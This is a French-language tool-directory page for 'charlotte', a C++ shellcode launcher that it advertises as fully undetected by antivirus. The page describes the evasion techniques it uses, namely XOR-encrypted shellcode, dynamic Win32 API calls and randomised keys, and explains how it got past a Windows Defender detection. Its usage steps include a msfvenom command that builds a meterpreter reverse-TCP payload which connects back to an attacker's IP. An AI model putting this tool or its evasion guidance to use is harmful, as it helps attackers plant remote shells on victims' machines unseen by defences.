Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
charlotte — c++ lanceur de shellcode entièrement indétectable ;) | Kitploit
Outils/GitHubGitHub/9emin1/charlotte
ExploitationÉvasion IDS/IPSShellcodeAnalyse de MalwareTests d'IntrusionRed TeamingGénération de ShellcodeDéveloppement de Charges UtilesAnti-Bot
GitHub9emin1/charlotte

charlotte

c++ lanceur de shellcode entièrement indétectable ;)

976207il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

charlotte

un lanceur de shellcode c++ totalement indétecté ;)

publié pour célébrer la naissance de mon nouveau-né

description

13/05/2021:

  1. lanceur de shellcode c++, totalement indétecté 0/26 en date du 13 mai 2021.
  2. invocation dynamique des fonctions d'API win32
  3. chiffrement XOR du shellcode et des noms de fonctions
  4. clés XOR et variables randomisées à chaque exécution
  5. sur Kali Linux, simplement 'apt-get install mingw-w64*' et voilà!

17/05/2021:

  1. longueur aléatoire des chaînes et longueur des clés XOR

antiscan.me

alt_text

utilisation

clonez le dépôt, générez votre fichier de shellcode nommé beacon.bin, et exécutez charlotte.py

exemple :

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profit

testé avec msfvenom -p (montré dans le .gif POC ci-dessous) et aussi avec un payload au format brut de Cobalt Strike

alt_text

mise à jour v1.1

17/05/21:

apparemment, Microsoft Windows Defender a pu détecter le binaire .DLL,

et comment l'ont-ils signalé ? en recherchant plusieurs clés XOR de 16 octets

le passer à 9 comme montré dans le .gif POC ci-dessous montre qu'il est maintenant à nouveau indétecté

bravo !

alt_text

Télécharger l’outil